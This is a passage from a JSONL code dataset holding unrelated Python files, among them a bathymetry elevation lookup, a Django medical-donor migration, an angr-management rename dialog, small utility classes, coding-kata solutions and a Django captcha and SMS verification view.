(Float64)\n # dd_array = arrach of degrees decimal values (Float64)\n #\n #\n geo_index = (np.abs(dd_array - dd)).argmin()\n return geo_index\n\ndef open_GEBCO_file(filepath):\n #\n # returns dataset in NetCDF format and from the dataset arrays of the latitudes and longitudes\n # filepath = filepath to GEBCO file\n #\n #\n NetCDF_dataset = netCDF4.Dataset(filepath)\n lats = NetCDF_dataset.variables['lat'][:]\n lons = NetCDF_dataset.variables['lon'][:]\n return NetCDF_dataset, lats, lons\n\ndef get_GEBCO_info(dataset):\n #\n # prints metadata in GEBCO file\n #\n #\n print(dataset.data_model)\n\n for attr in dataset.ncattrs():\n print(attr, '=', getattr(dataset, attr))\n\n print(dataset.variables)\n return\n\ndef get_elevation(lat, lon):\n #\n # returns the elevation given a latitude and longitude\n #\n lat_index = geo_idx(lat, lats)\n lon_index = geo_idx(lon, lons)\n return gebco.variables['elevation'][lat_index, lon_index]\n\n#\n#\n#Sea floor height (above mean sea level)\n#\n#\n#Tests\n#\ngebco, lats, lons = open_GEBCO_file('/media/mike/HDD/git/GEBCO/data/GEBCO_2014_2D.nc')\n#\n#\nprint(get_elevation(51.65, -3.2))\n#\n# individual tests\n#\nget_GEBCO_info(gebco)\nlat_index = geo_idx(51.65, lats)\nlon_index = geo_idx(-3.2, lons)\nprint('Latitude index: ', lat_index)\nprint('Longitude index: ', lon_index)\nprint('Latitude @ index: ', gebco.variables['lat'][lat_index])\nprint('Longitude @ index: ', gebco.variables['lon'][lon_index])\nprint('Elevation at location: ', gebco.variables['elevation'][lat_index, lon_index])\n\n\nprint(get_elevation(51.464, 1.0485))\nprint(get_elevation(26.259, 52.622))\nprint(get_elevation(33.474, 120.712))\n","sub_path":"GEBCO_GetElevation.py","file_name":"GEBCO_GetElevation.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"426356643","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tumour_type', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Analysis',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('desc_zh', models.TextField(blank=True)),\n ('desc_en', models.TextField(blank=True)),\n ('proc_zh', models.TextField(blank=True)),\n ('proc_en', models.TextField(blank=True)),\n ('result_zh', models.TextField(blank=True)),\n ('result_en', models.TextField(blank=True)),\n ('conc_zh', models.TextField(blank=True)),\n ('conc_en', models.TextField(blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='ClinicalInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('pry_site_zh', models.CharField(help_text=b'primary site', max_length=128, blank=True)),\n ('pry_site_en', models.CharField(help_text=b'primary site', max_length=128, db_index=True, blank=True)),\n ('vital_status', models.NullBooleanField()),\n ('vital_status5', models.NullBooleanField(help_text=b'5 years vital status')),\n ('survival_day', models.SmallIntegerField(null=True)),\n ('stage', models.CharField(max_length=128, blank=True)),\n ('stage_supplemental', models.CharField(max_length=128, blank=True)),\n ('stage_system', models.CharField(max_length=128, blank=True)),\n ('grade', models.CharField(max_length=128, blank=True)),\n ('grade_supplemental', models.CharField(max_length=128, blank=True)),\n ('grade_system', models.CharField(max_length=128, blank=True)),\n ('desc_zh', models.TextField(help_text=b'description', blank=True)),\n ('desc_en', models.TextField(help_text=b'description', blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Country',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name_zh', models.CharField(max_length=128)),\n ('name_en', models.CharField(max_length=128)),\n ('full_name_zh', models.CharField(max_length=128, blank=True)),\n ('full_name_en', models.CharField(max_length=128, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Donor',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('ngb_id', models.CharField(help_text=b'Format: NGBCD0000000001', unique=True, max_length=15, db_index=True)),\n ('org_id', models.CharField(help_text=b'origin id', max_length=128, blank=True)),\n ('gender', models.NullBooleanField(help_text=b'True is male and False is female.', db_index=True)),\n ('birthday', models.DateField(null=True)),\n ('diag_age', models.SmallIntegerField(null=True, db_index=True)),\n ('height', models.SmallIntegerField(help_text=b'cm', null=True)),\n ('weight', models.SmallIntegerField(help_text=b'kg', null=True)),\n ('pop_zh', models.CharField(help_text=b'population', max_length=128, blank=True)),\n ('pop_en', models.CharField(help_text=b'population', max_length=128, blank=True)),\n ('city_zh', models.CharField(max_length=128, blank=True)),\n ('city_en', models.CharField(max_length=128, blank=True)),\n ('state_zh', models.CharField(help_text=b'province or state', max_length=128)),\n ('state_en', models.CharField(help_text=b'province or state', max_length=128)),\n ('country', models.ForeignKey(related_name='Country_Donor', to='donor.Country', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='ICD10',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=10)),\n ('title', models.TextField()),\n ('parent', models.ForeignKey(related_name='ICD10_children', blank=True, to='donor.ICD10', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Morph',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=6)),\n ('title', models.TextField()),\n ('parent', models.ForeignKey(related_name='Morph_children', blank=True, to='donor.Morph', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='OtherInfo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('label_zh', models.CharField(max_length=128)),\n ('label_en', models.CharField(max_length=128)),\n ('value_zh', models.CharField(max_length=128)),\n ('value_en', models.CharField(max_length=128)),\n ('donor', models.ForeignKey(related_name='Donor_OtherInfo', to='donor.Donor')),\n ],\n ),\n migrations.CreateModel(\n name='Region',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name_zh', models.CharField(max_length=128)),\n ('name_en', models.CharField(max_length=128)),\n ],\n ),\n migrations.CreateModel(\n name='Sample',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('ngb_id', models.CharField(help_text=b'Format: NGBCS0000000001', unique=True, max_length=15, db_index=True)),\n ('org_id', models.CharField(help_text=b'origin id', max_length=128, blank=True)),\n ('s_type', models.SmallIntegerField(choices=[(-1, b'unknown/no data'), (0, b'normal'), (1, b'primary tumour'), (2, b'secondary tumour')])),\n ('t_type', models.SmallIntegerField(choices=[(0, b'tumor fresh tissue'), (1, b'tumor FF(fresh frozen)'), (2, b'tumor FFPE(Formalin-Fixed and Parrffin-Embedded)'), (3, b'matched normal peripheral blood'), (4, b'healthy human peripheral blood'), (5, b'leukemic blood'), (6, b'mouse xenograft derived from tumor'), (7, b'cell line derived from tumor'), (8, b'cell line derived from xenograft'), (9, b'cell line derived from normal tissue'), (10, b'other (specify)')])),\n ('grade', models.CharField(max_length=128, blank=True)),\n ('grade_supplemental', models.CharField(max_length=128, blank=True)),\n ('grade_system', models.CharField(max_length=128, blank=True)),\n ('date', models.DateField(null=True)),\n ('donor', models.ForeignKey(related_name='Donor_Sample', to='donor.Donor')),\n ],\n ),\n migrations.CreateModel(\n name='Topo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('code', models.CharField(max_length=6)),\n ('title', models.CharField(max_length=256)),\n ('icd_10', models.ForeignKey(related_name='ICD10_Topo', blank=True, to='donor.ICD10', null=True)),\n ('parent', models.ForeignKey(related_name='Topo_children', blank=True, to='donor.Topo', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Treatment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('tx_type_zh', models.CharField(help_text=b'treatment type', max_length=128)),\n ('tx_type_en', models.CharField(help_text=b'treatment type', max_length=128)),\n ('tx_result_zh', models.CharField(help_text=b'treatment rsult', max_length=128)),\n ('tx_result_en', models.CharField(help_text=b'treatment rsult', max_length=128)),\n ('date', models.DateField(default=None, null=True)),\n ('donor', models.ForeignKey(related_name='Donor_Treatment', to='donor.Donor')),\n ],\n ),\n migrations.AddField(\n model_name='country',\n name='region',\n field=models.ForeignKey(related_name='Region_Country', blank=True, to='donor.Region', null=True),\n ),\n migrations.AddField(\n model_name='clinicalinfo',\n name='donor',\n field=models.OneToOneField(related_name='Donor_ClinicalInfo', to='donor.Donor'),\n ),\n migrations.AddField(\n model_name='clinicalinfo',\n name='icd_10',\n field=models.ForeignKey(related_name='ICD10_Donor', to='donor.ICD10', null=True),\n ),\n migrations.AddField(\n model_name='clinicalinfo',\n name='morph',\n field=models.ForeignKey(related_name='Morph_Donor', to='donor.Morph', null=True),\n ),\n migrations.AddField(\n model_name='clinicalinfo',\n name='pry_site_class',\n field=models.ForeignKey(related_name='PrimarySiteClass_Donor', to='tumour_type.PrimarySiteClass', null=True),\n ),\n migrations.AddField(\n model_name='clinicalinfo',\n name='subtype',\n field=models.ForeignKey(related_name='SubType_Donor', to='tumour_type.TumourType'),\n ),\n migrations.AddField(\n model_name='clinicalinfo',\n name='topo',\n field=models.ForeignKey(related_name='Topo_Donor', to='donor.Topo', null=True),\n ),\n migrations.AddField(\n model_name='clinicalinfo',\n name='tumour_type',\n field=models.ForeignKey(related_name='TumourType_Donor', to='tumour_type.TumourType'),\n ),\n migrations.AddField(\n model_name='analysis',\n name='sample',\n field=models.ForeignKey(related_name='Sample_Analysis', to='donor.Sample'),\n ),\n ]\n","sub_path":"website/donor/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":10765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"458300218","text":"from typing import Optional, TYPE_CHECKING\n\nfrom PySide2.QtWidgets import QDialog, QVBoxLayout, QHBoxLayout, QLabel, QPushButton, QLineEdit\nfrom angr.analyses.decompiler.structured_codegen import CVariable, CFunction, CConstruct, CFunctionCall\n\nif TYPE_CHECKING:\n from angrmanagement.ui.views.disassembly_view import DisassemblyView\n from angrmanagement.ui.views.code_view import CodeView\n\n\nclass NodeNameBox(QLineEdit):\n def __init__(self, textchanged_callback, parent=None):\n super().__init__(parent)\n\n self.textChanged.connect(textchanged_callback)\n\n @property\n def name(self):\n text = self.text()\n if self._is_valid_node_name(text):\n return text.strip()\n return None\n\n @staticmethod\n def _is_valid_node_name(name):\n return name and not (' ' in name.strip())\n\n\nclass RenameNode(QDialog):\n def __init__(self, disasm_view: Optional['DisassemblyView'] = None, code_view: Optional['CodeView'] = None,\n node: Optional[CConstruct] = None, parent=None):\n super().__init__(parent)\n\n # initialization\n self._disasm_view = disasm_view\n self._code_view = code_view\n self._node = node\n\n self._name_box = None\n self._status_label = None\n self._ok_button = None\n\n self.setWindowTitle('Rename Variable')\n\n self.main_layout = QVBoxLayout()\n\n self._init_widgets()\n\n self.setLayout(self.main_layout)\n\n #\n # Private methods\n #\n\n def _init_widgets(self):\n\n # name label\n\n name_label = QLabel(self)\n name_label.setText('New name')\n\n name_box = NodeNameBox(self._on_name_changed, self)\n if self._node is not None:\n # parse node type, either a Function header or a Variable.\n if isinstance(self._node, CVariable) and self._node.unified_variable and self._node.unified_variable.name:\n name_box.setText(self._node.unified_variable.name)\n elif isinstance(self._node, CVariable) and self._node.variable.region == '':\n name_box.setText(self._node.variable.name)\n elif isinstance(self._node, CFunction) and self._node.name:\n name_box.setText(self._node.name)\n elif isinstance(self._node, CFunctionCall):\n name_box.setText(self._node.callee_func.name)\n\n name_box.selectAll()\n self._name_box = name_box\n\n label_layout = QHBoxLayout()\n label_layout.addWidget(name_label)\n label_layout.addWidget(name_box)\n self.main_layout.addLayout(label_layout)\n\n # status label\n status_label = QLabel(self)\n self.main_layout.addWidget(status_label)\n self._status_label = status_label\n\n # buttons\n ok_button = QPushButton(self)\n ok_button.setText('OK')\n ok_button.setEnabled(False)\n ok_button.clicked.connect(self._on_ok_clicked)\n self._ok_button = ok_button\n\n cancel_button = QPushButton(self)\n cancel_button.setText('Cancel')\n cancel_button.clicked.connect(self._on_cancel_clicked)\n\n buttons_layout = QHBoxLayout()\n buttons_layout.addWidget(ok_button)\n buttons_layout.addWidget(cancel_button)\n\n self.main_layout.addLayout(buttons_layout)\n\n #\n # Event handlers\n #\n\n def _on_name_changed(self, new_text): # pylint:disable=unused-argument\n\n if self._name_box is None:\n # initialization is not done yet\n return\n\n if self._name_box.name is None:\n # the variable name is invalid\n self._status_label.setText('Invalid')\n self._status_label.setProperty('class', 'status_invalid')\n self._ok_button.setEnabled(False)\n else:\n self._status_label.setText('Valid')\n self._status_label.setProperty('class', 'status_valid')\n self._ok_button.setEnabled(True)\n\n self._status_label.style().unpolish(self._status_label)\n self._status_label.style().polish(self._status_label)\n\n def _on_ok_clicked(self):\n node_name = self._name_box.name\n if node_name is not None:\n if self._code_view is not None and self._node is not None:\n if isinstance(self._node, CVariable) and self._node.unified_variable is not None:\n self._node.unified_variable.name = node_name\n self._node.unified_variable.renamed = True\n elif isinstance(self._node, CVariable) and self._node.variable.region == '':\n self._code_view.workspace.instance.kb.labels[self._node.variable.addr] = node_name\n self._node.variable.name = node_name\n elif isinstance(self._node, CFunction):\n code_kb = self._code_view.codegen.kb\n code_kb.functions[self._node.name].name = node_name\n self._node.name = node_name\n self._node.demangled_name = node_name\n elif isinstance(self._node, CFunctionCall):\n self._node.callee_func.name = node_name\n\n self._code_view.codegen.am_event()\n self.close()\n\n def _on_cancel_clicked(self):\n self.close()\n","sub_path":"angrmanagement/ui/dialogs/rename_node.py","file_name":"rename_node.py","file_ext":"py","file_size_in_byte":5266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"476616351","text":"import numpy as np\nimport sys\nimport os\n\nfrom util import *\n# spec the path\ntrain_ratio = .9\nfname = 'text8_raw.txt'\n\ndata_dir = '/Users/Qihong/Dropbox/github/char_lstm/data/text8/'\ninput_file_path = os.path.join(data_dir, fname)\n\n# 10^8 chars in the file\nnum_chars , _ , _ = get_doc_counts(input_file_path)\ntrain_size = int(num_chars * train_ratio)\nvalid_size = int(num_chars * (1 - train_ratio))\n\n# load the text file\nfile = open(input_file_path, 'r')\n\n# split training and test set\n# read the training seq\ntrain = file.read(train_size)\n# jump to where it was left\nfile.seek(file.tell())\n# read the valid seq\nvalid = file.read(valid_size)\n\n# save them as txt\nwrite2txtfile(train, data_dir, 'train.txt')\nwrite2txtfile(valid, data_dir, 'valid.txt')\n\n# convert text to ascii values - NOT NEEDED FOR THE CHAR_LSTM\n# train = string2list_of_ascii(train)\n# valid = string2list_of_ascii(valid)\n\n# write it to a .npz file\n# np.savez(path+fname_out, train=train, valid=valid)\n\n# # check file\n# npzfile = np.load(path+fname_out)\n# print npzfile.files\n# temp = npzfile['train']\n# print type(temp[1])","sub_path":"data/txt_split.py","file_name":"txt_split.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"172770659","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"BMI class.\"\"\"\n\n\nclass BMI:\n\n __weight = None\n __height = None\n __bmi = None\n __perfect_bmi = 21.75\n __rate = 1\n\n def __init__(self, weight=None, height=None):\n \"\"\"Init BMI class.\"\"\"\n if weight is not None and isinstance(weight, (float, int)):\n self.__set_weight(weight)\n else:\n print('Wrong weight.')\n if height is not None and isinstance(height, float):\n self.__set_height(height)\n else:\n print('Wrong height.')\n\n def get_bmi(self):\n \"\"\"Return BMI.\"\"\"\n if self.__calculate() is True:\n return self.__bmi\n else:\n return False\n\n def norm(self):\n \"\"\"Is BMI is in norm\"\"\"\n if self.__calculate() is True:\n if self.__bmi < (18.5 / self.__rate):\n return -1\n elif self.__bmi >= (25 / self.__rate):\n return 1\n else:\n return 0\n else:\n return False\n\n def get_correct_weight(self):\n \"\"\"Get correct weight of body\"\"\"\n if self.__calculate() is True:\n if self.__bmi < (18.5 / self.__rate):\n return (18.5 / self.__rate) * (self.__height ** 2)\n elif self.__bmi >= (25 / self.__rate):\n return (24.99 / self.__rate) * (self.__height ** 2)\n else:\n return (self.__perfect_bmi / self.__rate) * (self.__height ** 2)\n else:\n return False\n\n def __set_weight(self, person_weight):\n \"\"\"Set weight.\"\"\"\n self.__weight = person_weight\n\n def __set_height(self, person_height):\n \"\"\"Set height.\"\"\"\n self.__height = person_height\n\n def __calculate(self):\n \"\"\"Calculate BMI.\"\"\"\n if self.__weight is not None and self.__height is not None:\n self.__bmi = (self.__weight / self.__height ** 2) / self.__rate\n return True\n else:\n return False\n","sub_path":"src/bmi.py","file_name":"bmi.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"289743406","text":"'''\n17. Letter Combinations of a Phone Number My Submissions Question\nTotal Accepted: 73843 Total Submissions: 261622 Difficulty: Medium\nGiven a digit string, return all possible letter combinations that the number could represent.\n\nA mapping of digit to letters (just like on the telephone buttons) is given below.\n\n\n\nInput:Digit string \"23\"\nOutput: [\"ad\", \"ae\", \"af\", \"bd\", \"be\", \"bf\", \"cd\", \"ce\", \"cf\"].\nNote:\nAlthough the above answer is in lexicographical order, your answer could be in any order you want.\n'''\n\nclass Solution(object):\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n encodings = [\"\", \"\",\"abc\",\"def\",\"ghi\",\"jkl\",\"mno\",\"pqrs\",\"tuv\",\"wxyz\"]\n result = [\"\"] \n for d in digits: \n encodes = encodings[int(d)]\n result = [r + e for r in result for e in encodes]\n return result if len(digits) > 0 else []\n ","sub_path":"17_letter_combinations_of_phone_number.py","file_name":"17_letter_combinations_of_phone_number.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"555870752","text":"'''\nThe purpose of a spectrum object is to maintain the calculated values for a given spectrum.\n\nHistory:\n\n6/25/2018: Class created\n\n'''\nimport numpy as np\n\nclass Spectrum:\n\n\tdef __init__(self, waves, name):\n\n\t\tself.waves = waves\n\t\tself.name = name\n\t\tself.isSolved = False\n\t\tself.values = [0,0,0]\n\t\tself.grpsize = 8\n\t\tself.peaks = self.findpeaks()\n\t\t\n\n\tdef findpeaks(self):\n\t\tstart = 0\n\t\tfinish = start + self.grpsize\n\t\tpeakindex = []\n\t\tpstart = 0\n\n\n\t\twhile finish < 2048:\n\t\t\tsection = np.array(self.waves[start:finish])\n\t\t\tdowncheck = -np.sort(-section)\n\t\t\tif np.array_equal(section, downcheck):\n\t\t\t\tpstart = section[0]\n\t\t\t\tval, index = self.recurse_search(finish)\n\t\t\t\tpeakindex.append((val,index))\n\t\t\t\tfinish = index\n\n\t\t\tstart = finish\n\t\t\tfinish = start + self.grpsize\n\n\tdef pickpeak(self, wantedindeces):\n\t\tpeaks = []\n\t\tbuffer = 4\n\t\tfor index in wantedindeces:\n\t\t\ttemplist = self.waves[index-buffer : index+buffer]\n\t\t\ttemplist = np.sort(templist)\n\t\t\tif len(np.nonzero(self.waves == templist[0])[0]) == 1:\n\t\t\t\tpeaks.append(np.nonzero(self.waves == templist[0])[0][0])\n\t\t\telse:\n\t\t\t\tmultiples = np.nonzero(self.waves == templist[0])\n\t\t\t\tfor idx in multiples[0]:\n\t\t\t\t\tif idx < index+buffer and idx > index-buffer:\n\t\t\t\t\t\tpeaks.append(idx)\n\t\treturn peaks\t\n\n\tdef recurse_search(self, index):\n\t\tval, idx = self.fall_down(index)\n\t\ttempsect = np.array(self.waves[idx:(idx+self.grpsize)])\n\t\tcount = 0\n\t\ttempidx = idx\n\t\twhile countnext:\n\t\t\tcurr = next\n\t\t\tcount+=1\n\t\t\tnext = self.waves[count]\n\n\t\treturn (curr, count)\n\n\t\t\t\t\n\t\t\n\n\n","sub_path":"Honors Thesis Research/Code/Old Versions/Data Redux V2/Extras/spectrum.py","file_name":"spectrum.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"341163545","text":"from .dictionary import Dictionary\n\nclass Font(str):\n\n def __new__(cls, value):\n self = super(Font, cls).__new__(cls, '\\x1b[{}m'.format(value))\n self.value = str(value)\n return self\n\n def __repr__(self):\n return '{}({!r})'.format(self.__class__.__name__, self.value)\n\n def __add__(self, other):\n if isinstance(other, self.__class__):\n return self.__class__('{};{}'.format(self.value, other.value))\n return super(Font, self).__add__(other)\n\n def __getitem__(self, font):\n return self + fonts[font]\n\n def __getattr__(self, font):\n try:\n return self[font]\n except KeyError as error:\n raise AttributeError(*error.args)\n\n def __call__(self, string):\n return self + string + fonts.RESET\n\nfonts = Dictionary(\n\n RESET = Font(0),\n BOLD = Font(1),\n DIM = Font(2),\n ITALIC = Font(3),\n UNDERLINE = Font(4),\n BLINK = Font(5),\n REVERSE = Font(7),\n HIDDEN = Font(8),\n\n RESET_BOLD = Font(21),\n RESET_DIM = Font(22),\n RESET_ITALIC = Font(23),\n RESET_UNDERLINE = Font(24),\n\n BLACK = Font(30),\n RED = Font(31),\n GREEN = Font(32),\n YELLOW = Font(33),\n BLUE = Font(34),\n MAGENTA = Font(35),\n CYAN = Font(36),\n WHITE = Font(37),\n RESET_FOREGROUND = Font(39),\n\n ON_BLACK = Font(40),\n ON_RED = Font(41),\n ON_GREEN = Font(42),\n ON_YELLOW = Font(43),\n ON_BLUE = Font(44),\n ON_MAGENTA = Font(45),\n ON_CYAN = Font(46),\n ON_WHITE = Font(47),\n RESET_BACKGROUND = Font(49),\n\n BRIGHT_BLACK = Font(90),\n BRIGHT_RED = Font(91),\n BRIGHT_GREEN = Font(92),\n BRIGHT_YELLOW = Font(93),\n BRIGHT_BLUE = Font(94),\n BRIGHT_MAGENTA = Font(95),\n BRIGHT_CYAN = Font(96),\n BRIGHT_WHITE = Font(97),\n\n ON_BRIGHT_BLACK = Font(100),\n ON_BRIGHT_RED = Font(101),\n ON_BRIGHT_GREEN = Font(102),\n ON_BRIGHT_YELLOW = Font(103),\n ON_BRIGHT_BLUE = Font(104),\n ON_BRIGHT_MAGENTA = Font(105),\n ON_BRIGHT_CYAN = Font(106),\n ON_BRIGHT_WHITE = Font(107),\n\n)\n","sub_path":"pychi/log/utils/font.py","file_name":"font.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"95775067","text":"#! /usr/bin/env python\n#coding=utf-8\nimport csv\nfrom urllib import urlopen\nfrom bs4 import BeautifulSoup as BS\n\nhtml = urlopen(\"http://en.wikipedia.org/wiki/Comparision_of_text_editors\")\nbsObj = BS(html, \"lxml\")\n\ntable = bsObj.findAll(\"table\", {\"class\": \"wikitable\"})[0]\nrows = table.findAll(\"tr\")\n\ncsvFile = open(\"editor.csv\", \"Wt\")\nwriter = csv.writer(csvFile)\n\ntry:\n for row in rows:\n csvRow = []\n for cell in row.findAll(['td', 'th']):\n csvRow.append(cell.get_text())\n writer.writeRow(csvRow)\nfinally:\n csvFile.close()","sub_path":"src/webscraping/data_to_csv.py","file_name":"data_to_csv.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"139450180","text":"def snail(snail_map):\n n = len(snail_map)\n\n out = []\n if len(snail_map[0]) != n:\n print('ERROR')\n else:\n for total in range(2*(n-1)):\n j = total\n i = total - j\n while i < n and j < n:\n out = outall(out, snail_map[i][j])\n j += 1\n\n\n return out\n\ndef outall(listfinal, newvalue):\n if newvalue not in listfinal:\n return listfinal + [newvalue]\n else:\n return listfinal\n\n\n#### TDD TESTING\nclass Test:\n def assert_equals(value, expected):\n from nose.tools import assert_equal\n try:\n assert_equal(value, expected)\n print('EQUAL --> got =', value, \" == ex =\", expected)\n except:\n message = ' // # ' + str(value) + ' should == ' + str(expected)\n print('UNEQUAL!! --> got =', value, \" != ex =\", expected, message)\n\n @classmethod\n def describe(cls, param):\n print(param)\n\n## TDD\narray = [[1,2,3],[4,5,6],[7,8,9]]\nexpected = [1,2,3,6,9,8,7,4,5]\nTest.assert_equals(snail(array), expected)\n\n\narray = [[1,2,3],[8,9,4],[7,6,5]]\nexpected = [1,2,3,4,5,6,7,8,9]\nTest.assert_equals(snail(array), expected)\n","sub_path":"4kyu_snail3.py","file_name":"4kyu_snail3.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"59398309","text":"# 导入的是python的内置模块\nimport logging\nimport json\nimport random\nimport string\n\n# 导入djiang的内置模块\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django_redis import get_redis_connection\nfrom django.http import HttpResponse, JsonResponse\n\n# 导入自己的函数和定义的包\nfrom utils.captcha.captcha import captcha\nfrom utils.json_fun import to_json_data\nfrom utils.res_code import Code, error_map\nfrom . import constants\nfrom users.models import Users\nfrom . import forms\nfrom utils.yuntongxun.sms import CCP\n\n# 导入日志器\nlogger = logging.getLogger('django')\n\nclass ImageCode(View):\n\n \"\"\"\n create image_code\n # 1、创建一个类视图\n \"\"\"\n def get(self,request,image_code_id):\n \"\"\"\n # 2、从前端获取参数\n # 3、校验参数\n # 4、生成图片验证码图片以及图片验证码文本\n\n \"\"\"\n text, image = captcha.generate_captcha()\n # logger.info(\"Image code: {}\".format(text))\n # 5、保存图片验证码到redis\n con_redis = get_redis_connection(alias = 'verify_code')\n img_key = \"img_{}\".format(image_code_id).encode('utf-8')\n con_redis.setex(img_key, constants.IMAGE_CODE_REDIS_EXPIRES,text)\n logger.info(text)\n # 6、返回图片验证码图片给前端\n return HttpResponse(content=image, content_type=\"image/jpg\")\n\n# 创建一个类视图\n# 校验参数\n # 路径参数 字符串参数 form表单 Ajax传参数\n# 查询数据\n# 返回校验数据\nclass CheckUsernameView(View):\n def get(self,request,username):\n # count = Users.objects.filter(username=username.count())\n # if not user:\n # return HttpResponse('可以注册')\n # else:\n # return HttpResponse('不能注册')\n data = {\n 'username': username,\n 'count': Users.objects.filter(username=username).count()\n }\n return to_json_data(data=data)\n\n\n\nclass CheckMobileView(View):\n \"\"\"\n 验证注册的手机号是否存在\n GET mobiles/(?P1[3-9]\\d{9})/\n \"\"\"\n\n def get(self, request, mobile):\n\n data = {\n 'mobile': mobile,\n 'count': Users.objects.filter(mobile=mobile).count()\n }\n return to_json_data(data=data)\n\n\n# 1.创建类视图\n# 2.获取前端传过来的json格式数据\n# 3.校验参数\n# 4.发送短信验证码\n# 5.将短信验证码文本和发送短信验证码记录保存到redis\n# 6.将json格式数据返回前端\n\nclass SmsCodesView(View):\n def post(self, request):\n json_data = request.body\n if not json_data:\n return to_json_data(errno=Code.PARAMERR,errmsg=error_map[Code.PARAMERR])\n #将json转化为dict\n dict_data = json.loads(json_data.decode('utf8'))\n\n # mobile = dict_data.get('mobile')\n # image_code_id = dict_data.get('image_code_id')\n # text = dict_data.get('text')\n\n form = forms.CheckImgCodeForm(data=dict_data)\n if form.is_valid():\n # 获取手机号\n mobile = form.cleaned_data.get('mobile')\n # 创建短信验证码内容\n sms_num = \"%06d\" % random.randint(0, 999999)\n\n redis_conn = get_redis_connection('verify_code')\n #创建一个在60s以内是否有发送短信记录的标记\n\n sms_flag_fmt = \"sms_flag_{}\".format(mobile).encode('utf8')\n # 创建保存短信验证码的标记key\n sms_text_fmt = \"sms_{}\" .format(mobile).encode('utf8')\n # pl = redis_conn.pipeline()\n redis_conn.setex(sms_flag_fmt,constants.SEND_SMS_CODE_INTERVAL,1)\n a = redis_conn.setex(sms_text_fmt, 300, sms_num)\n print(a)\n\n # try:\n # pl.setex(sms_flag_fmt.encode('utf8'),constants.SEND_SMS_CODE_INTERVAL,1)\n # pl.setex(sms_text_fmt.encode('utf8'),constants.SMS_CODE_REDIS_EXPIRES,sms_num)\n # pl.execute()\n # except Exception as e:\n # logger.debug(\"redis 执行出现异常: {}\".format(e))\n # return to_json_data(errno=Code.UNKOWNERR,errmsg=error_map[Code.UNKOWNERR])\n\n logger.info(\"发送验证码短信[正常][mobile: %s sms_code: %s]\" % (mobile, sms_num))\n return to_json_data(errmsg=\"短信验证码发送成功\")\n\n # error是很严重的错误的提示\n # info 是比较温和的提示\n # warning是温馨警告\n\n # try:\n # result = CCP().send_template_sms(mobile,[sms_num,constants.SMS_CODE_YUNTX_EXPIRES],constants.SMS_CODE_TEMP_ID)\n #\n # except Exception as e:\n # logger.error(\"发送验证码短信[异常][mobile: %s,message: %s]\" % (mobile,e))\n # return to_json_data(errno=Code.SMSERROR,errmsg=error_map[Code.SMSERROR])\n # else:\n # if result == 0:\n # logger.info(\"发送验证码短信[正常][ mobile: %s sms_code: %s]\" % (mobile, sms_num))\n # return to_json_data(errmsg=\"短信验证码发送成功\")\n # else:\n # logger.warning(\"发送验证码短信[失败][ mobile: %s ]\" % mobile)\n # return to_json_data(errno=Code.SMSFAIL, errmsg=error_map[Code.SMSFAIL])\n\n\n\n\n else:\n # 定义一个错误信息列表\n err_msg_list = []\n for item in form.errors.get_json_data().values():\n err_msg_list.append(item[0].get('message'))\n\n # print(item[0].get('message')) # for test\n\n err_msg_str = '/'.join(err_msg_list) # 拼接错误信息为一个字符串\n #将json格式返回前端\n return 